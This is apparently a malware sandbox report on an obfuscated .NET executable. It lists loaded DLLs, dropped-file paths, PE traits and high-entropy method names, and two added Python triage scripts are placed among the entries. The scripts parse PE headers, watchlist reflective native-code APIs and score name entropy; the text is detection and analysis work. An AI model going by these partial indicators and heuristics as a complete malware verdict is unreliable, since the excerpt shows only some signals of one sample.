Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: mscoree.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: apphelp.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: version.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: windows.storage.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: wldp.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: profapi.dll
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static file information: File size 2335232 > 1048576
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x239a00
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
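The static PE observations above (a CLR header in the COM descriptor data directory, a .text section and a file both larger than 1 MiB, and the DllCharacteristics flags) can be reproduced without a sandbox. The block below is an added example, not the sandbox's code: a standard-library PE header walker that evaluates those checks, plus a constructed PE32+ image whose section sizes and flags mirror the values reported above so the checks run offline. The CLR directory RVA, image base, alignments and the exact .text virtual size are assumptions of the example; pass a real file path to triage it instead.

```python
"""Static PE triage reproducing the checks listed above (CLR header present,
.text larger than 1 MiB, file larger than 1 MiB, DllCharacteristics flags)
with only the standard library. Added example; not the sandbox's own code."""
import struct

# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits named in the report (PE/COFF spec)
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x8000: "TERMINAL_SERVER_AWARE",
}
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14   # CLR runtime header: non-empty => .NET image
ONE_MIB = 0x100000


def parse_pe(data: bytes) -> dict:
    """Walk DOS -> PE signature -> COFF -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = pe_off + 4
    num_sections, = struct.unpack_from("<H", data, coff + 2)
    size_opt, = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    magic, = struct.unpack_from("<H", data, opt)
    dll_chars, = struct.unpack_from("<H", data, opt + 70)      # same offset in PE32 and PE32+
    if magic == 0x20B:                                         # PE32+
        ndirs_off, dirs_off = opt + 108, opt + 112
    elif magic == 0x10B:                                       # PE32
        ndirs_off, dirs_off = opt + 92, opt + 96
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    ndirs, = struct.unpack_from("<I", data, ndirs_off)
    dirs = [struct.unpack_from("<II", data, dirs_off + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(num_sections):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from(
            "<8sIIII", data, opt + size_opt + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "vaddr": vaddr,
                         "rawsize": rawsize, "rawptr": rawptr})
    return {"magic": magic, "dll_chars": dll_chars, "dirs": dirs, "sections": sections}


def triage(data: bytes) -> dict:
    """Evaluate the report's static heuristics on a PE image held in memory."""
    pe = parse_pe(data)
    clr_va, clr_size = (pe["dirs"][IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR]
                        if len(pe["dirs"]) > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR else (0, 0))
    text = next((s for s in pe["sections"] if s["name"] == ".text"), None)
    return {
        "is_dotnet": clr_va != 0 and clr_size != 0,
        "dll_characteristics": [n for bit, n in sorted(DLL_CHARACTERISTICS.items())
                                if pe["dll_chars"] & bit],
        "file_size_over_1mib": len(data) > ONE_MIB,
        "text_vsize_over_1mib": bool(text) and text["vsize"] > ONE_MIB,
        "text_rawsize_over_1mib": bool(text) and text["rawsize"] > ONE_MIB,
    }


def build_sample_pe(text_rawsize=0x239A00, text_vsize=0x23989E,
                    dll_chars=0x8540, with_clr=True) -> bytes:
    """Constructed PE32+ image with one zero-filled .text section. The raw size
    and flags default to the values reported above; the virtual size, CLR
    directory RVA, image base and alignments are assumed."""
    headers = 0x200
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x0022)
    dirs = [(0, 0)] * 16
    if with_clr:
        dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] = (0x2000, 0x48)
    opt = struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII",
                      0x20B, 14, 0, text_rawsize, 0x600, 0, 0x2000, 0x2000,
                      0x140000000, 0x2000, 0x200, 6, 0, 0, 0, 6, 0, 0,
                      0x23C000, headers, 0, 3, dll_chars,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, len(dirs))
    opt += b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
    section = struct.pack("<8sIIIIIIHHI", b".text", text_vsize, 0x2000,
                          text_rawsize, headers, 0, 0, 0, 0, 0x60000020)
    image = bytes(dos) + b"PE\0\0" + coff + opt + section
    return image.ljust(headers, b"\0") + bytes(text_rawsize)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for key, value in triage(blob).items():
        print("%-24s %s" % (key, value))
```

A non-empty COM descriptor directory is the reliable test for a managed image; the "mscoree.dll" entries in the loaded-module lists above are the run-time counterpart of the same fact. An oversized, zero-heavy .text in a .NET binary is what a packed or resource-embedded payload usually looks like, so the two size checks are worth keeping together.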

Data Obfuscation

Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.cs .Net Code: Type.GetTypeFromHandle(PZVO9XQyvEW6EWkCOTf.bIKBvN28j2l(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(PZVO9XQyvEW6EWkCOTf.bIKBvN28j2l(16777246)),Type.GetTypeFromHandle(PZVO9XQyvEW6EWkCOTf.bIKBvN28j2l(16777260))})
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF848DF00BD pushad ; iretd 0_2_00007FF848DF00C1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF848DF4C1A push esi; retf 0_2_00007FF848DF4C21
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF848FAC3FB push ecx; iretd 0_2_00007FF848FAC3FC
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF849042601 push es; ret 0_2_00007FF849042605
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF8490418E2 push edx; ret 0_2_00007FF8490418E4
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF849044714 push edx; ret 0_2_00007FF849044716
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF849042B42 push edi; ret 0_2_00007FF849042B43
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Code function: 53_2_00007FF848E200BD pushad ; iretd 53_2_00007FF848E200C1
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Code function: 53_2_00007FF848E24C1A push esi; retf 53_2_00007FF848E24C21
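Two of the Data Obfuscation checks in this section, the reflective lookup quoted in the .Net Code entry above and the "High entropy of concatenated method names" entries that follow, can be reproduced over decompiled C# text. The block below is an added example, not Joe Sandbox code: it runs the report's quoted GetMethod statement through a watchlist of reflection targets, decodes the integer constants handed to the type-handle resolver as ECMA-335 metadata tokens (the high byte names the table, 0x01 being TypeRef), and applies the entropy heuristic to one name set copied from the report next to a set of ordinary identifiers. The watchlist, the 4.8 bits-per-character threshold and the plain name set are assumptions of the example.

```python
"""Two of the Data Obfuscation heuristics applied in this report, reimplemented
over decompiled C# text: reflective lookup of dangerous methods and high
entropy of concatenated method names. Added example; not Joe Sandbox code."""
import math
import re
from collections import Counter

# Constructed input: the decompiled statement quoted in the report entry above.
SNIPPET = ('Type.GetTypeFromHandle(PZVO9XQyvEW6EWkCOTf.bIKBvN28j2l(16777425))'
           '.GetMethod("GetDelegateForFunctionPointer", new Type[2]{'
           'Type.GetTypeFromHandle(PZVO9XQyvEW6EWkCOTf.bIKBvN28j2l(16777246)),'
           'Type.GetTypeFromHandle(PZVO9XQyvEW6EWkCOTf.bIKBvN28j2l(16777260))})')

# Reflection targets worth flagging: each lets managed code reach native code,
# load further assemblies or run code without a static call site. The list is
# an assumption of this example, not the sandbox's own watchlist.
WATCHLIST = {"GetDelegateForFunctionPointer", "GetProcAddress", "LoadLibrary",
             "Load", "Invoke", "InvokeMember", "VirtualProtect", "VirtualAlloc"}

# ECMA-335 II.22: the high byte of a metadata token identifies the table.
METADATA_TABLES = {0x01: "TypeRef", 0x02: "TypeDef", 0x06: "MethodDef",
                   0x0A: "MemberRef", 0x1B: "TypeSpec"}

GETMETHOD_RE = re.compile(r'\.GetMethod\(\s*"([A-Za-z_][A-Za-z0-9_]*)"')
HANDLE_RE = re.compile(r'GetTypeFromHandle\([\w.]+\((\d+)\)\)')


def reflective_targets(source: str) -> list:
    """Names passed to Type.GetMethod that are on the watchlist."""
    return [m for m in GETMETHOD_RE.findall(source) if m in WATCHLIST]


def decode_token(token: int) -> tuple:
    """Split a metadata token into (table name, row index)."""
    table = token >> 24
    return METADATA_TABLES.get(table, "table_0x%02x" % table), token & 0xFFFFFF


def resolved_handles(source: str) -> list:
    """Integer constants fed to a type-handle resolver, decoded as metadata tokens.
    Resolving the type from a raw token at run time means the target type never
    appears as a direct reference at the call site."""
    return [decode_token(int(t)) for t in HANDLE_RE.findall(source)]


def shannon_entropy(text: str) -> float:
    """Bits per character of the text's byte-frequency distribution."""
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values()) if n else 0.0


ENTROPY_THRESHOLD = 4.8   # bits per character; assumed cut-off, tune on your own corpus


def method_names_look_generated(names: list) -> bool:
    """The 'High entropy of concatenated method names' check: random mixed-case
    alphanumerics approach log2(62) ~ 5.95 bits per character, while natural
    identifiers stay well below that."""
    return shannon_entropy("".join(names)) > ENTROPY_THRESHOLD


# Constructed name sets: the first is copied from a report entry in this
# section, the second is what a hand-written class usually looks like.
OBFUSCATED = ['yH64sxUQPW9Dic6D28X6', 'JHpy9BUQ9StbmGFHXi8K', 'i9EOOKHIHw',
              'uvvFeMUQ4govAjVxRdM6', 'yijOOVUQo55U9nrAyDx5', 'WYxPsmUQumP8GfZ1TNmW',
              'Li8v0XUQHh33r4xtIsKt', 'Vfb9KyUQpk2xXHGKZ5E1', 'Iq3QNEUQjQxZZT3vGIjE',
              'vTHgqjUQTJnJ3x8s3Dl3']
PLAIN = ['Main', 'LoadConfiguration', 'ConnectToServer', 'SendHeartbeat',
         'ParseArguments', 'WriteLog', 'Dispose', 'GetHashCode', 'ToString', 'Equals']

if __name__ == "__main__":
    print("reflective targets:", reflective_targets(SNIPPET))
    print("resolved handles:  ", resolved_handles(SNIPPET))
    print("obfuscated names flagged:", method_names_look_generated(OBFUSCATED))
    print("plain names flagged:     ", method_names_look_generated(PLAIN))
```

Run it over a decompiler export of the sample (one file per class) and both signals line up with the report: the GetMethod target is Marshal.GetDelegateForFunctionPointer, the classic bridge from managed code to a native function pointer, and every class in the list above scores well over the threshold while ordinary identifiers score around four bits per character.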
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.cs High entropy of concatenated method names: 'yH64sxUQPW9Dic6D28X6', 'JHpy9BUQ9StbmGFHXi8K', 'i9EOOKHIHw', 'uvvFeMUQ4govAjVxRdM6', 'yijOOVUQo55U9nrAyDx5', 'WYxPsmUQumP8GfZ1TNmW', 'Li8v0XUQHh33r4xtIsKt', 'Vfb9KyUQpk2xXHGKZ5E1', 'Iq3QNEUQjQxZZT3vGIjE', 'vTHgqjUQTJnJ3x8s3Dl3'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, kwPSPhrX6AXT1PPkDSR.cs High entropy of concatenated method names: 'c1emR9xfXA', 'RaYmUMa7Gx', 'VqumBkd842', 'bwMm8HliLR', 'rGmmYvMSY2', 'Veq1m8UfxnsSyl0vt8Ad', 'ovC2acUfS3FX3753dfjC', 'K6nsbIUfI96P685PNwEH', 'YgDFWdUfwNrGpaaQUcG5', 'Nt0FfRUfgGfJQkyGbMle'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, zA8EyhxiAaulRTNFJqY.cs High entropy of concatenated method names: '_54f', 'd65', 'k1mUYYDH7ro', 'fn4UYvNWu9p', 'SEfUI563PUi', 'zp2UYRcxbBk', 'jWj8r9Ujkd00LwSy0mx4', 's9kc4LUjEbn3NeCg4G8e', 'ay66u1UjfqW8ZWt3Bby7', 'dkwfdqUjnjSvRTeLIJRs'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, iq1W5kgtq5FSXBee3L4.cs High entropy of concatenated method names: 'Vxxk4WULyQ0cS3ynrd8e', 'uvse9KULb8wsiG1a5NaO', 'bWeE6yULmFnP3xbDLdA3', 'vVnTjEUL0Pl5eT8my0dT', '_7kT', '_376', 'GajgIKwLFG', 'h94gxOLwYY', '_4p5', 'MU0gwpob4Y'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, FWLFUjYDI5Z9lLMo7SC.cs High entropy of concatenated method names: 'FlUYQU56lA', 'nfLYXSulH9', 'UOOYzs1SQQ', 'VbV0ReUodLtsF3KK5Xkt', 'N9o4HoUoFrYEAQZLyS8y', 'Va9g3LUoDVyt9uIBHitD', 'y7ItGOUoeinAFR13N9Zs', 'jlrYeh20bP', 'ARDYlq1Eg6', 'sW7YKAwEYs'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, iZka6hv6hoQB0oDAyyK.cs High entropy of concatenated method names: 'epgvOs62Gn', 'OFdvQnIjSk', 'VBw2cxUuExD1eOIhQTqU', 'b7bSMrUunkgSWRfFvl5k', 'lGmrXBUukLY8dcC4XseL', 'FTStUcyfYR', 'dipqv4UusEuAkiXqZBSw', 'BygKPCUuNrgDvGemvQhU', 'dF1DLbUuh0RdLVOFvK5B', 'pq2MZhUu6aIXQfTlmZwm'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, jagvsqxlbQ1Npg5bcIb.cs High entropy of concatenated method names: '_46E', 'd65', 'KSqxJ4A7gI', 'kl1UI4DITta', 'zp2UYRcxbBk', 'ApIxOYh090', 'E8XXGkUTol8XykkGs4y7', 'KD9hQhUTupZKR06diPMm', 'Lv52EUUTC5jMpCMFpMY7', 'YXy6oGUT4vdZ4DHcAti5'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, MuXgOReXnWG7lZYIbVW.cs High entropy of concatenated method names: 'nwhlBIpErD', 'kX9l87EoX1', 'N9VcUDUOjQhKvox6vFZ0', 'DYeUWbUOHIg1bJvRZRa1', 's6HKojUOp66pNd2L62Mr', 'zGNvpNUOTy2nEvIACJI3', 'Y3of2mUO3smdHStsagsw', 'AbllRswKw3', 'GF24v4UO4q8MjMZpdfl7', 'cKw9mDUOodivSS2qxQlv'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, XqZuliVwjQ7OvhqDjPK.cs High entropy of concatenated method names: 'OSIVW96eHB', 'dUBVAlpUKV', 'L1rVifKCev', 'q5C6oHU6t3w8JFb1wj8c', 'dJTmbFU6YACuA8NXe9Pt', 'U3imbsU6vpQ4GVW0wHYg', 'NiBrJfU6SPQB6ywAa1TH', 'rWKSJWU6IjQPwhRrxMDc'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, QJHE5TYPMVMbxLvlIfA.cs High entropy of concatenated method names: 'vv2YMJMYOF', 'YXnYVjvPKD', 'o8mYCKHmhL', 'WeAY4j3kth', 'mgpv8mUoqgtv5oEtHYhC', 'CdRpAKUoy9cqZ56XNCCA', 'g467veUobBQF9km8EIM4', 'I6qwa9Uo2KlASZZZdBF5', 'MFT3f4UoG1qrslVoO4WK', 'zpDpJSUo7XpddjYbuAoQ'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, LHAdmnQESAYTZ15ORjB.cs High entropy of concatenated method names: 'JPQUts2dq1m', 'nFVUtNCevFA', 'Ma3UtF3osYT', 'dEAUtDeb9r8', 'zdVUtdFx13K', 'NYdUteJhkv2', 'ObuUtlmDPNZ', 'J4JXxYQAEC', 'lSsUtK60nDt', 'zwxUtJxo90P'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, b5xWcCyB1wLmtO2HCCC.cs High entropy of concatenated method names: 'Doyyy8Urvo', 'J2gyqLl8wo', 'UqpyYdYt7w', 'CdqyvLy6dY', 'VdeytaDOck', 'IsJySf8gto', 'AvCyI3sLQQ', 'ip4yxyiBIb', 'sG5ywNHMU2', 'jWUygp6d3F'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, DUnBXYBErhNJVq3uIso.cs High entropy of concatenated method names: 'XT6BQEUyly', 'VXPBXl9Mgr', 'gDGBzwvdAU', 'nHIjq8UCLjSh7L2pUkpU', 'UThFp8UCcTrjQ3XQLfmJ', 'NWy87EUCTfP5ZHut2RFe', 'WQDJQfUC3rP8UfnIEP3L', 'QKt8vOrVP4', 'FvpYbGUCnsTaFPh1hmR9', 'XfC0FVUCk66A5mFjkPGP'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, otpoGTCcQMZp3wPo5xn.cs High entropy of concatenated method names: 'rBmCnbTH6u', 'r1tCkDV4IN', 'eRYCEl8JoZ', 'vOECapUEBK', 'nXQChXJKOB', 'KeoC6u4QQp', '_4tg', 'wk8', '_59a', '_914'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, pJIJLUAE8v2YFOD09Go.cs High entropy of concatenated method names: 'CdXAh5oZaS', 'swmA6a6f4u', 'SoFAsc9diL', 'OxEANGjhsp', 'AOPAFSREiK', 'M96aq1Uc8O8rgqRBtH29', 'VEnBlOUcUyQsp38gZ1ry', 'I0pCSEUcBnbnn7D4oSJv', 'SqpiQnUcY3WFkyNLP9kb', 's97ptGUcvgydV7SGCPjY'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, RfoLfwUH8RAQV8sRBm0.cs High entropy of concatenated method names: 'c3G', 'V29', 'u9l', '_2Q4', '_78M', 'atAUI0PvadZ', 'n6rU8F0761x', 'eRnbgxUVYxcvtOqTDitn', 'jqTmoJUVvptivO3Lf425', 'bHOPmSUVtRXJ4GqI6apY'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, PYZXvvYf49oySEdTINW.cs High entropy of concatenated method names: 'BRlYNfcYGT', 'X3GpcHUonCnBnPYcCBZj', 'gMCBjFUoknBXu7NarTHK', 'gwgSb4UoEaLCgJqSWWOm', 'JJLYkxb46E', 'kHUYEpPDnK', 'cI4YaP4xXd', 'NX1YyKUo3pxfwXGxZc28', 'q76XTPUoL9QyGqckegFO', 'KoB3CkUojJS0tS9QH1Gi'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, WAFgav3bYkZ6iAl5HF8.cs High entropy of concatenated method names: 'vUO32aglGJ', 'mp53GldtAE', 'UMI37gXNiU', 'Roy3ZH4brP', 'w2D35Pb6fp', 'yvU319muGA', 'H1s3PGdGkI', 'mZZ39Wm8ir', 'LQ33MrTaYb', 'iBc3VF4N4n'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, a7B0JrmzObeCCtmOJs5.cs High entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'JqK0UhGaTS', 'mn60Blpa7T', 'gY2', 'rV4', '_28E'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, QLEqd5yeA3ehGBr5A76.cs High entropy of concatenated method names: 'yolRx1UEcmQJIcy4ptvR', 'bod2PAUE35XkUNk5GoRv', 'TStXV8UELmfGZFtldAsi', 'xNqv75UEf222aexyc1Uq', 'jmYZPR7Kvi', 'saLTT7UEaaqHQE2a47IS', 'oscGE5UEk43aVE8ojyPO', 'TuyF7XUEEyx7MQWjKE2P', 'rFcN0iUEh7ndGPHZtwea', 'yKoZVhd2yb'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, tHAAHjoRh1feG0AOJyt.cs High entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, lnX7gnwJQkLP0ZywDe1.cs High entropy of concatenated method names: 'My5', 'V4X', 'zT6', 'TqEwQxtvW9', 'ohpUIn3l4QT', 'PMGwX7LHv6', 'rSUUIklJRPw', 'Uq06jOU36s3ejjC5GBcp', 'V1G49KU3atK6QrQrjKR8', 'ODWZPcU3hJWNLLbMnyyx'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, lOpa0QHZwdmAYd1Li0Z.cs High entropy of concatenated method names: 'f86pmJRXuI', 'wm02FgUFQEtSYDXvyr2V', 'WDqDSqUFJOUZEcYB6ENl', 'wFxii6UFOVJBM53Ppycq', 'OZoeQBUFXOOyeCd89ZZY', 'i5X', 'TZcH1jFmbY', 'W93', 'L67', '_2PR'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, IqZmiYIsU1GgVaBhusb.cs High entropy of concatenated method names: 'oK2Il1L6jm', 'pJKIKkvaQh', 'EpWIJKdYZK', 'WlQIOl30xY', 'ei4IQ2UXTN', 'O1NIXcjwuH', 'TofIzK5hYq', 'HfquxQUjPN8Ualk5cHcI', 'AtFnpiUj9ODEdRBFlrpP', 'qnFoeLUj5ARqFQfg8dDX'
